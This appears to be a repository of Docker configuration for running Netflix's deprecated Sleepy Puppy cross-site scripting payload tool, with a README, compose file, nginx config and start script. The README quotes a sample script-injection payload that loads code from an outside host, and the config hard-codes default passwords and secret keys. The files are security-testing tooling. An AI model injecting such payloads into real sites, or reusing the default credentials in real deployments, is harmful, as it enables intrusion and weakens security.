├── OSSMETADATA
├── README.md
├── docker-compose.yml
├── nginx
    ├── Dockerfile
    ├── nginx.conf
    └── sites-enabled
    │   └── sleepy_puppy
└── web
    ├── Dockerfile
    └── api-start.sh


/OSSMETADATA:
--------------------------------------------------------------------------------
1 | osslifecycle=inactive
2 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | DEPRECATED
 2 | =======================
 3 | 
 4 | 
 5 | For full documentation, please see the [wiki](https://github.com/Netflix/sleepy-puppy/wiki).
 6 | 
 7 | This repo utilizes docker compose to launch a cluster of containers to support the sleepy-puppy project.  This is only meant to be used to **play**.  See the [Issues](#Issues) section for information regarding productionalizing these containers.
 8 | 
 9 | ----------
10 | 
11 | ###Requirements
12 | * Latest version of [Docker Toolbox](https://www.docker.com/toolbox)
13 | * A vm you have created with docker-machine
14 | * Terminal with all docker env variables set
15 | 
16 | Starting
17 | -------------
18 | First determine the ip address of your docker vm
19 | 
20 | > docker-machine ls
21 | 
22 | Replace the host variable in `docker-compose.yaml` with that IP
23 | 
24 | ```
25 |     host: <YOUR IP ADDRESS HERE>
26 | ```
27 | 
28 | Start the conatiners
29 | 
30 | > docker-compose up
31 | 
32 | Stopping
33 | -------------
34 | > docker-compose stop
35 | 
36 | Try It Out
37 | -------------
38 | Launch web browser and connect to your docker container's IP over http. 
39 | The default credientials are `admin/password`
40 | 
41 | 
42 | Architecture
43 | -------------
44 | 
45 | This project launches three containers:
46 | 
47 |  1. postgres:latest
48 |  2. sleepy-puppy-nginx:0.2.0
49 |  3. sleepy-puppy-web:0.2.0
50 | 
51 | Externally, only sleepy-puppy-nginx exposes any ports.  This container only exposes TCP 80.  See the [Issues](#Issues) section for an explanation of why TCP 443 was not exposed.
52 | 
53 | 
54 | Issues
55 | -------------
56 | 
57 | **No SSL**
58 | Other containers in the zeroToDocker project use self-signed SSL certificates, as only the user will be required to have their browser accept this SSL cert.  For sleepy-puppy, the user, and anyone browsing any site with a sleepy-puppy payload would need to accept the self-signed SSL cert.
59 | 
60 | This is likely to cause confusion when trying to get a payload to fire.  To simplify the situation, the docker will not expose SSL.  To save a few characters and avoid mixed-content warnings, sleepy-puppy payloads exclude the protocol.
61 | 
62 | 	> '"><script src=//ti.ht/x?u=2></script>
63 | 
64 | Because the payloads exclude the protocol, and the container is not listening on SSL, the payloads will only fire on HTTP (not HTTPS) sites.
65 | 
66 | If you plan to run this in production, you will need to obtain an SSL cert from a trusted source and modify the sleepy-puppy-nginx container to terminate the SSL.
67 | 
68 | ----------
69 | 
70 | **Default credentials on the web UI**
71 | The username for the sleepy-puppy web UI is `admin`.  The docker-compose.yml defines the password as `password` by setting the `DOCKER_ADMIN_PASS` environment variable.  
72 | 
73 | For production use, you will want to modify or remove this default account.
74 | 
75 | **Default Flask-Secret and CSRF-Secret**
76 | The docker-compose.yml defines a `secret_key` and `csrf_session_key` environment variable which are passed into the Flask application.
77 | 
78 | For production use, you will want to modify these values.
79 | 
80 | **Default credentials on the postgres database**
81 | The username for the postgres database is `postgres`.  The password for this database is actually set in the api-start.sh file found within the sleepy-puppy-web container.  This password is set to `password`.
82 | 
83 | You may wish to change this password for production use.
84 | 


--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | sleepy-puppy-web:
 2 |   restart: always
 3 |   build: ./web
 4 |   expose:
 5 |     - "8000"
 6 |   links:
 7 |     - postgres:postgres
 8 |   volumes:
 9 |     - /usr/local/src/sleepy-puppy/sleepypuppy/static
10 |   environment:
11 |     DEBUG: False
12 |     sleepypuppy_db: postgresql://postgres:password@postgres/sleepypuppydb
13 |     secret_key: 5(15ds+i2+%ik6z&!yer+ga9m=e%jcqiz_5wszg)r-z!2--b2d
14 |     csrf_session_key: 5(18ds+i2+%ik6z&!yer+ga9m=e%jcqiz_5wszg)r-z!2--b2d
15 |     DOCKER_ADMIN_PASS: password
16 |     host: 192.168.59.103
17 | sleepy-puppy-nginx:
18 |   restart: always
19 |   build: ./nginx/
20 |   ports:
21 |     - "80:80"
22 |   volumes:
23 |     - /www/static
24 |   volumes_from:
25 |     - sleepy-puppy-web
26 |   links:
27 |     - sleepy-puppy-web
28 |     - sleepy-puppy-web:web
29 | 
30 | # data:
31 | #  restart: always
32 | #  image: postgres:latest
33 | #  volumes:
34 | #    - /var/lib/postgresql
35 | #  command: /bin/true
36 | 
37 | postgres:
38 |   restart: always
39 |   image: postgres:latest
40 |   # volumes_from:
41 |   #  - data
42 |   ports:
43 |     - "5432"
44 | 


--------------------------------------------------------------------------------
/nginx/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM nginx
2 | # RUN rm /etc/nginx/sites-enabled/default
3 | ADD sites-enabled/ /etc/nginx/sites-enabled
4 | COPY nginx.conf /etc/nginx/nginx.conf
5 | 


--------------------------------------------------------------------------------
/nginx/nginx.conf:
--------------------------------------------------------------------------------
 1 | user  nginx;
 2 | worker_processes  1;
 3 | 
 4 | error_log  /var/log/nginx/error.log warn;
 5 | pid        /var/run/nginx.pid;
 6 | 
 7 | 
 8 | events {
 9 |     worker_connections  1024;
10 | }
11 | 
12 | 
13 | http {
14 |     include       /etc/nginx/mime.types;
15 |     default_type  application/octet-stream;
16 | 
17 |     log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
18 |                       '$status $body_bytes_sent "$http_referer" '
19 |                       '"$http_user_agent" "$http_x_forwarded_for"';
20 | 
21 |     access_log  /var/log/nginx/access.log  main;
22 | 
23 |     sendfile        on;
24 |     #tcp_nopush     on;
25 | 
26 |     keepalive_timeout  65;
27 | 
28 |     #gzip  on;
29 | 
30 |     # include /etc/nginx/conf.d/*.conf;
31 |     include /etc/nginx/sites-enabled/*;
32 | 
33 | }
34 | 


--------------------------------------------------------------------------------
/nginx/sites-enabled/sleepy_puppy:
--------------------------------------------------------------------------------
 1 | server {
 2 | 
 3 |     listen 80;
 4 |     server_name sleepypuppy.io;
 5 |     charset utf-8;
 6 | 
 7 | 
 8 |     location / {
 9 |         proxy_pass http://web:8000;
10 |         proxy_set_header Host $host;
11 |         proxy_set_header X-Real-IP $remote_addr;
12 |         proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
13 |     }
14 | }
15 | 


--------------------------------------------------------------------------------
/web/Dockerfile:
--------------------------------------------------------------------------------
 1 | # Copyright 2014 Netflix, Inc.
 2 | #
 3 | # Licensed under the Apache License, Version 2.0 (the "License");
 4 | # you may not use this file except in compliance with the License.
 5 | # You may obtain a copy of the License at
 6 | #
 7 | #     http://www.apache.org/licenses/LICENSE-2.0
 8 | #
 9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 | 
15 | FROM ubuntu:14.04
16 | MAINTAINER Netflix Open Source Development <talent@netflix.com>
17 | 
18 | RUN apt-get update && apt-get -y -q install python-software-properties software-properties-common postgresql-9.3 postgresql-client-9.3 postgresql-contrib-9.3 && apt-get install -y curl python-dev python-pip git sudo && apt-get -y -q install python-psycopg2 libpq-dev libffi-dev
19 | 
20 | RUN cd /usr/local/src &&\
21 |   git clone --depth 1 -b 0.2.2b --branch master https://github.com/Netflix/sleepy-puppy.git &&\
22 |   cd sleepy-puppy &&\
23 |   python setup.py install
24 | 
25 | ADD api-start.sh /usr/local/src/sleepy-puppy/scripts/api-start.sh
26 | RUN chmod +x /usr/local/src/sleepy-puppy/scripts/api-start.sh
27 | 
28 | ENTRYPOINT ["/usr/local/src/sleepy-puppy/scripts/api-start.sh"]
29 | 


--------------------------------------------------------------------------------
/web/api-start.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | echo "Changing postgres password..."
 4 | sudo -u postgres psql -h postgres --command "ALTER USER postgres with PASSWORD 'password';"
 5 | echo "Done changing postgres password..."
 6 | echo "Creating sleepypuppydb....."
 7 | sudo -u postgres createdb -h postgres -O postgres sleepypuppydb
 8 | echo "DONE CREATING sleepypuppydb..."
 9 | 
10 | cd /usr/local/src/sleepy-puppy
11 | python manage.py setup_sleepy_puppy
12 | gunicorn -w 4 -b 0.0.0.0:8000 sleepypuppy:app
13 | 


--------------------------------------------------------------------------------